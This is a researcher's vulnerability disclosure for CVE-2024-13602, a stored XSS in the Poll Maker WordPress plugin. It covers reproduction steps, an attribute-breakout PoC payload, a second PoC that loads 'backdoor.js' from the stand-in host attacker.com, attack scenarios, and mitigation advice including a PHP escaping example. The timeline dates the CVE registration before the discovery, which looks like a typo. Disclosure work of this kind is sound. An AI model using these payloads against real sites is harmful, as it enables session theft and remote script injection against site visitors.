Cross-Site Scripting (XSS) vulnerabilities remain one of the most persistent security threats in web applications, including WordPress plugins. The vulnerability CVE-2024-13602 was discovered in the “Poll Maker” WordPress plugin, allowing an attacker to inject malicious JavaScript code into the plugin’s redirect settings. This stored XSS vulnerability can be leveraged to execute arbitrary JavaScript, potentially leading to full account takeovers or JavaScript-based backdoor creation.
| Field | Value |
|---|---|
| CVE | CVE-2024-13602 |
| Plugin | Poll Maker < 5.5.4 |
| Criticality | Medium |
| All Time | 515 079 |
| Active installations | 7 000+ |
| Publicly Published | February 24, 2025 |
| Last Updated | February 24, 2025 |
| Researcher | Artyom Krugov |
| OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
| PoC | Yes |
| Exploit | No |
| Reference | https://wpscan.com/vulnerability/05d5010b-94eb-4fd3-b962-e2a16c032b71/ , https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13602 |
Timeline

| Date | Event |
|---|---|
| November 26, 2024 | Plugin testing and vulnerability detection in Poll Maker were completed |
| November 26, 2024 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| February 24, 2024 | Registered CVE-2024-13602 |
Discovery of the Vulnerability
The vulnerability was identified in the “Answer Redirection” feature of the Poll Maker plugin. This feature allows administrators to define custom redirection URLs for poll answers, but it does not properly sanitize user input. By injecting a specially crafted payload into the redirect URL field, an attacker can execute arbitrary JavaScript code when a user interacts with the poll.
Steps to Reproduce:
- Navigate to the “Poll Maker” plugin tab in WordPress.
- Create a new poll.
- In the “Options Settings” section, locate the “Answer Redirection” column and enable it.
- Insert a malicious XSS payload into the “Redirect URL” column.
- Publish the poll and insert its shortcode into a WordPress post or page.
- When a user interacts with the poll, the JavaScript payload is executed in their browser.
Proof-of-Concept (PoC) Payload:

```html
123123"asdads=''"><script></script><img src=x onerror=alert(document.domain)>
```
Understanding XSS Attacks
Stored XSS occurs when malicious scripts are permanently stored on the target server (e.g., in the database) and later executed by users. Unlike Reflected XSS, which requires user interaction with a crafted link, Stored XSS can impact all users who view or interact with the compromised content.
Common Attack Scenarios in WordPress:
- Malicious Admin Takeover: Injecting JavaScript into administrative pages to steal session cookies or perform actions as an administrator.
- Credential Theft: Capturing login credentials via a fake login form injected into a vulnerable input field.
- JavaScript Backdoor Creation: Modifying existing JavaScript files to create persistent access or control over the site.
- Defacement and Phishing: Injecting malicious content to deceive users into entering sensitive data.
Exploiting the XSS Vulnerability
Once a successful XSS payload is injected into the “Poll Maker” plugin’s settings, attackers can exploit it in various ways:
PoC:

```html
<script> document.write('<script src="http://attacker.com/backdoor.js"></script>'); </script>
```
This script dynamically loads a remote JavaScript file, allowing an attacker to modify website behavior or inject additional payloads.
Recommendations for Improved Security
To mitigate the risks associated with CVE-2024-13602, the following security measures should be implemented:
Immediate Fixes:
- Update the Plugin: Check for security patches from the Poll Maker plugin developers and apply updates immediately.
- Sanitize User Input: Ensure all input fields, especially those that accept URLs, are properly sanitized and escaped before being stored in the database.
- Use Content Security Policy (CSP): Implement a strong CSP header to restrict the execution of untrusted scripts.
- Enable WordPress Security Plugins: Utilize security plugins like Wordfence or Sucuri to detect and block XSS attempts.
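The "Sanitize User Input" recommendation, as an added example that is not Poll Maker's code: plain PHP validates the Redirect URL on save and escapes it in the attribute context on output, next to the unsanitized pattern that lets the PoC payload break out of the attribute. In a WordPress plugin the two steps correspond to `esc_url_raw()` when saving and `esc_attr()`/`esc_url()` when rendering; the `poll-answer` markup and `data-redirect` attribute are assumed for illustration.

```php
<?php
// Added example (not the plugin's code): validating and escaping a poll
// "Redirect URL" setting. Plain PHP so it runs stand-alone; in WordPress the
// same two steps map to esc_url_raw() on save and esc_attr()/esc_url() on output.

// Constructed sample inputs: the PoC payload from the advisory and a benign URL.
$poc    = '123123"asdads=\'\'"><script></script><img src=x onerror=alert(document.domain)>';
$benign = 'https://example.com/thanks?poll=1&answer=2';

// Vulnerable pattern: the stored value is concatenated straight into an attribute.
// The payload's leading double quote closes the attribute; the rest becomes markup.
function render_answer_vulnerable(string $redirect): string {
    return '<div class="poll-answer" data-redirect="' . $redirect . '">Answer</div>';
}

// Step 1 (on save): accept only absolute http(s) URLs. Markup, relative junk and
// non-http schemes (e.g. javascript:) are rejected and the option is stored empty.
function sanitize_redirect_url(string $input): string {
    $input = trim($input);
    if (filter_var($input, FILTER_VALIDATE_URL) === false) {
        return '';
    }
    $scheme = strtolower((string) parse_url($input, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $input : '';
}

// Step 2 (on output): escape for the HTML attribute context, quotes included.
// This is defence in depth: even a value that slipped past step 1 cannot
// terminate the attribute, because " becomes &quot; and < becomes &lt;.
function render_answer_hardened(string $stored_redirect): string {
    $safe = htmlspecialchars($stored_redirect, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="poll-answer" data-redirect="' . $safe . '">Answer</div>';
}

// Demonstration on the constructed inputs.
echo render_answer_vulnerable($poc), PHP_EOL;                        // attribute broken, <img onerror=...> emitted
echo render_answer_hardened(sanitize_redirect_url($poc)), PHP_EOL;   // payload rejected on save: data-redirect=""
echo render_answer_hardened($poc), PHP_EOL;                          // validation bypassed, output escaping still holds
echo render_answer_hardened(sanitize_redirect_url($benign)), PHP_EOL; // benign URL kept, & encoded as &amp;
```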
Long-Term Security Practices:
- Regular Security Audits: Conduct regular security assessments to identify and patch vulnerabilities before attackers exploit them.
- Limit User Privileges: Follow the principle of least privilege (PoLP) by ensuring only necessary users have access to high-risk features.
- Educate Users and Admins: Train website administrators on security best practices to recognize potential threats.
To prevent this type of attack, the vendor adopted the prevention methods we recommended.
By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-13602, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
ARTYOM K.